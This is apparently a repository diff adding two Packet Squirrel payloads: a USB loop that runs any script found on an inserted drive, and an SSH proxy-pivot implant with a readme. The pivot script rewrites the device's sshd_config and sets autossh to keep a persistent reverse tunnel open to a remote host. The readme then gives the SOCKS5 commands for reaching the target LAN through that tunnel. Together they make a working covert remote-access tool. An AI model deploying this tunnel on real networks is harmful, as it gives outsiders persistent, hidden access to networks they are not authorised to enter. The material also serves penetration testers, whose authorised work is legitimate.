Merge c3465e6e85 into c9b0f6e091

SSH Proxy Pivot

payloads/general/USB-DriveBy/README.md

@@ -0,0 +1,23 @@
+# USB-DriveBy
+* Category: General
+* Author: 90N45
+* Version: 1.0
+
+### Description
+Use an USB storage device to deploy payloads on-demand while the Packet Squirrel is already set up and running.
+
+### Setup
+1. Start your Packet Squirrel with the USB-DriveBy payload.
+2. Whenever you want to start any payload on-demand, place the payload file with the name `payload.txt` on any compatible USB storage device.
+3. When the LED lights up solid green, you can insert the USB storage into the Squirrel’s USB-A port whenever a new payload is needed.
+4. You can unplug your USB storage device at the moment your payload starts
+
+### Tip: Add an LED indicator to your payloads to indicate that your payloads have finished.
+When your payload is finished, the USB-DriveBy payload will wait 10 seconds until it executes the script on your USB storage device again (if it is still present). This means that you should know when your payloads have finished and your USB storage device should be unplugged at the latest.
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Default network mode will be established |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Listening for USB storage device. Ready to run scripts. |
+| Red slow symmetric blinking (FAIL) | No payload file found on USB storage device |

payloads/general/USB-DriveBy/payload.txt

@@ -0,0 +1,35 @@
+#!/bin/bash
+
+# Title: USB-DriveBy
+# Description: Use an USB storage device to deploy payloads on-demand
+# Author: 90N45
+# Version: 1.0
+# Category: General
+
+# Choose your preferred default network mode
+NETWORK_MODE="TRANSPARENT"
+
+LED SETUP
+
+NETMODE ${NETWORK_MODE}
+
+LED FINISH
+
+while true; do 
+	# Check for available USB storage
+	USB_STORAGE && {
+		# Check for available payload
+		if [ -f "/usb/payload.txt" ]; then
+    		# Run payload from USB storage
+			bash /usb/payload.txt
+			# Sleep to prevent triggering the payload twice unintended
+			sleep 10
+		else
+			# LED FAIL if file is not on USB storage
+			LED FAIL
+		fi
+	} || {
+		# Make sure to restore LED color if USB storage is detached after LED FAIL
+		LED G
+	}
+done

payloads/library/remote-access/SSH-proxy-pivot/payload.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+# Title: SSH Socks5 Proxy tunnel to Squirrel
+# Description: Creates Dynamic port forwarding available on Squirrel to allow for pivoting inside network from remote server.
+# Author: BlackPropaganda
+# Version: 0.2
+# Category: Remote-Access
+# Net Mode: NAT
+# Firmware: 3.2
+#
+# LED State Descriptions
+# Magenta Solid - SSH connecting
+# Amber - SSH connection attempted
+#
+
+NETMODE NAT
+LED SETUP
+
+# More information can be found in the readme.
+
+autossh_host="squirrel@<remote_ssh_host>"
+autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
+autossh_port="22"
+autossh_remoteport="2222"
+autossh_localport="22"
+switch=SWITCH
+interface="eth1"
+
+if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
+   echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
+   LED FAIL
+   exit 1
+fi
+
+#
+# the following was slightly modified from dark_pyrro (the legend) via:
+# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
+#
+
+# waiting until eth1 acquires IP address
+while ! ifconfig "$interface" | grep "inet addr"; do sleep 1; done
+
+# modifying SSHD to support TCP forwarding
+echo "Match User root" >> /etc/ssh/sshd_config
+echo "       AllowTcpForwarding yes"  >> /etc/ssh/sshd_config
+echo -e "       GatewayPorts yes\n" >> /etc/ssh/sshd_config
+
+
+echo -e "starting reconfigured server.\n" >> /root/payloads/$switch/debug.txt
+
+# starting sshd and waiting for process to start
+/etc/init.d/sshd start
+until netstat -tulpn | grep -qi "sshd"
+do
+    sleep 1
+done
+
+# stopping autossh
+/etc/init.d/autossh stop
+
+#
+# Much like the SSH server, AutoSSH has a configuration file. This
+# needs to be configured to support this connection as a daemon.
+#
+# Create a "fresh template" for the autossh configuration
+# Starting with an empty autossh file in /etc/config
+# isn't something that uci is very fond of
+echo "config autossh" > /etc/config/autossh
+echo "        option ssh" >> /etc/config/autossh
+echo "        option enabled" >> /etc/config/autossh
+
+
+# UCI configuration and commission
+uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
+uci set autossh.@autossh[0].enabled="1"
+uci commit autossh
+
+LED ATTACK
+
+# starting autossh
+/etc/init.d/autossh start
+
+# Happy Hunting.

payloads/library/remote-access/SSH-proxy-pivot/readme.md

@@ -0,0 +1,72 @@
+# Squirrel SSH Proxy Pivot
+___
+Have you ever laid down a Squirrel and thought 'darn I really want to pivot through this network, 
+but I left all my leet tools on my other machine.'
+
+Those days are over with this payload. Using a similar method to accessing the squirrel via SSH 
+we can initiate a Dynamic Port Forwarding tunnel into the target network, just adding one more 
+hop (bunnies should be good at this).
+
+    Proxy Client     Remote SSH Host     Packet Squirrel        Proxy Target
+          ___              ___             (inside LAN)              ___
+         /  /|            /  /|             _______                 /  /|
+        /__/ |  <=====>  /__/ |   <=====>  /______/`)   <=====>    /__/ |
+        |--| |           |--| |           (__[__]_)/               |--| |
+        | *|/            | *|/                                     | *|/
+
+
+___
+### Remote SSH Configuration
+___
+
+For this payload to function properly, the following must be configured
+
+* SSH Key based Authentication
+  * Remote SSH Host
+  * Packet Squirrel
+* SSH Port forwarding
+  * Both Hosts are required to support this
+
+A separate SSH server is required for this payload to function. This server must be configured
+to accept pubkey authentication for at least one user and contain the ssh key file on the Squirrel.
+___
+#### Remote SSH Server Pubkey Authentication
+The configuration for the remote SSH server for pubkey authentication can be found here: https://gist.github.com/BlackPropaganda/3c50e1993014bd59905df77c2fd46869
+
+Configuring the squirrel is similar. Just enroll the pubkey to /root/.ssh/authorized_keys. There's no need to modify the
+SSHD config file since the config file does not persist between boots and pubkey authentication is enabled by default.
+___
+#### SSH Port Forwarding configuration on Remote SSH server
+
+GatewayPorts and AllowTcpForwarding need to be enabled on the Remote SSH Server in order for the
+proxy to function properly. More on this here https://gist.github.com/BlackPropaganda/2801c43a7754ac56b80e3d03ede29169
+
+The Remote SSH Server will need a copy of the key generated for the Squirrel.
+
+___
+#### Squirrel SSH Pubkey Authentication
+
+Lets create a new key for the Squirrel
+
+    ssh-keygen -t rsa -b 1024 -f squirrel_rsa
+
+In arming mode, run this:
+
+    ssh-copy-id -i squirrel_rsa root@172.16.32.1
+
+___
+### Initiating the Proxy Connection
+___
+
+Copy the squirrel SSH key to the Remote SSH Server then connect to the squirrel
+
+    ssh -L 1080:localhost:1080 $user@$remote_server_ip "ssh -i /home/sshuser/squirrel_rsa -p $lport_fwd_port -D 1080 root@127.0.0.1"
+
+Where:
+* /home/sshuser/squirrel_rsa is the SSH key generated for the Squirrel, residing on the Remote SSH Server
+* 1080 is the proxy port (socks5 default)
+* $user is a user with TCP forwarding enabled on the Remote SSH Server
+* $remote_server_ip is the Remote SSH Server IP
+* $lport_fwd_port is the Squirrels ssh server reachable by the port configured in the Payload.
+
+Goes without saying, but use at your own risk. Don't do bad things.